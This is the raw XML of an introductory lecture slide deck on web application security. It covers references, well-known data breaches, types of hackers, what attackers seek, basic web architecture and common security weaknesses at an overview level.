                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>References</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22531" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="251520" y="1985541"/>
            <a:ext cx="8568952" cy="4395787"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Open Web Application Security Project: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="200B5B"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>www.owasp.org</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="200B5B"/>
              </a:solidFill>
              <a:latin typeface="+mj-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:latin typeface="+mj-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>PHP Manual: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0">
                <a:latin typeface="+mj-lt"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>http://php.net/manual/en/security.php</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2000" dirty="0">
              <a:latin typeface="+mj-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="2000" dirty="0">
              <a:latin typeface="+mj-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Most PHP books discuss security. Many books can be accessed online via the library. Examples:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Nixon, R (2014) Learning PHP, MySQL &amp; JavaScript. O`Reilly.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Lockhart, J (2016) Modern PHP, New Features and Good Practices. O`Reilly. (This book is more advanced – see chapter 5 ‘good practices’). </a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2000" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="+mj-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>GDPR: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>https://ico.org.uk/for-organisations/guide-to-data-protection/guide-to-the-general-data-protection-regulation-gdpr/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="20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90BD1-3757-A449-89B7-67E552A31B94}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Security failures …</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A0AC4C8B-ED7F-6747-AACF-23C1759C9B9A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>2018: Marriott reveal that a guest reservation database in the Starwood division had been compromised since 2014, revealing records of up to 500 million customers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>2018: Over 2000 mobile apps found to use misconfigured Firebase databases that make data publicly available</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>2018: It is revealed that 50 million profiles scraped by Cambridge Analytica were used to target voters</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>2018: Just Eat stop making customers’ personal data available to delivery drivers after reports of harassment </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="125263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FB46-1D98-BD48-8716-88BC7CBF70F1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Hacking</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FD28E489-5294-2A48-81F2-9AF741DA83F3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>A ”security hacker” is someone who uses bugs or exploits to break into a computer system</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>“White Hat” hackers operate with system owners consent to inform them about problems so they can be fixed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>“Black Hat” hackers try to steal, exploit or sell data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>”Grey Hat” hackers work without consent but not necessarily maliciously</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="717593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147887" y="332656"/>
            <a:ext cx="6736481" cy="961033"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>What do hackers seek?</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Disclosure of confidential data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Modification of important data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Interruption of service</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>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973832" y="404664"/>
            <a:ext cx="7414592" cy="864642"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0">
                <a:latin typeface="Calibri" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>Basic web application architecture</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="4000" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="1555750"/>
            <a:ext cx="7772400" cy="504825"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Web apps </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>provide access to your data via the Internet</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="web-app-arch.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="504825" y="2149475"/>
            <a:ext cx="8181975" cy="4375150"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="190500" algn="tl" rotWithShape="0">
              <a:srgbClr val="808080">
                <a:alpha val="70000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
          <a:extLst/>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5125" name="TextBox 9"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7343775" y="6488113"/>
            <a:ext cx="180022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a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Source: nuwarp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094928" y="260648"/>
            <a:ext cx="7149480" cy="998984"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:latin typeface="Calibri" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>Intelligence gathering</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6147" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Calibri" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>Profile the target</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:solidFill>
            <a:schemeClr val="tx1">
              <a:lumMod val="10000"/>
              <a:lumOff val="90000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>A good target profile can uncover many potential weaknesses</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Examples:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Un-patched software</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Open ports</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Weak authentication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Poor security on sensitive data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="609600" indent="-609600" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6149" name="Text Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB">
                <a:latin typeface="Calibri" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>Analysis and attack!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Content Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:solidFill>
            <a:schemeClr val="accent1">
              <a:lumMod val="20000"/>
              <a:lumOff val="80000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="609600" indent="-609600" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>Analyze information to determine target</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0">
                <a:latin typeface="Calibri" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>s weaknesses</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="609600" indent="-609600" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>Launch attacks against known weaknesses</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="609600" indent="-609600"/>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              <a:cs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checkerboard(across)">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="4">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checkerboard(across)">
                                      <p:cBhvr>
                                        <p:cTn id="10" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="4">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checkerboard(across)">
                                      <p:cBhvr>
                                        <p:cTn id="13" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="4">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checkerboard(across)">
                                      <p:cBhvr>
                                        <p:cTn id="1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31863" y="404664"/>
            <a:ext cx="7158037" cy="817017"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>Web application security issues</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17411" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="395537" y="1700808"/>
            <a:ext cx="8215064" cy="4395192"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Most web applications use standard ports</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>HTTP uses port 80</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>HTTPS (SSL) uses port 443</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Easy access through the exterior firewall</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Connect to a web app and you are </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>inside</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> the company</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>s system</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Hopefully, there is at least one more firewall between the web server and the internal network</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Staff training  and user awareness</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Insecure web data entry and data storage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checkerboard(across)">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="17411">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checkerboard(across)">
                                      <p:cBhvr>
                                        <p:cTn id="10" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="17411">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Effect transition="in" filter="checkerboard(across)">
                                      <p:cBhvr>
                                        <p:cTn id="13" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="17411">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7411">
                                            <p:txEl>
                                              <p:pRg st="3" end="3"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="checkerboard(across)">
                                      <p:cBhvr>
                                        <p:cTn id="16" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="17411">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animEffect transition="in" filter="checkerboard(across)">
                                      <p:cBhvr>
                                        <p:cTn id="19" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="17411">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7411">
                                            <p:txEl>
                                              <p:pRg st="5" end="5"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="checkerboard(across)">
                                      <p:cBhvr>
                                        <p:cTn id="22" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1741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animEffect transition="in" filter="checkerboard(across)">
                                      <p:cBhvr>
                                        <p:cTn id="27" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="17411">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17411">
                                            <p:txEl>
                                              <p:pRg st="7" end="7"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="checkerboard(across)">
                                      <p:cBhvr>
                                        <p:cTn id="32"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racket">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bracket.thmx</Template>
  <TotalTime>4180</TotalTime>
  <Words>1262</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>227</Paragraphs>
  <Slides>31</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Times New Roman</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>bracket</vt:lpstr>
      <vt:lpstr>Introduction to web security</vt:lpstr>
      <vt:lpstr>In this lecture</vt:lpstr>
      <vt:lpstr>Why security?</vt:lpstr>
      <vt:lpstr>Security failures …</vt:lpstr>
      <vt:lpstr>Hacking</vt:lpstr>
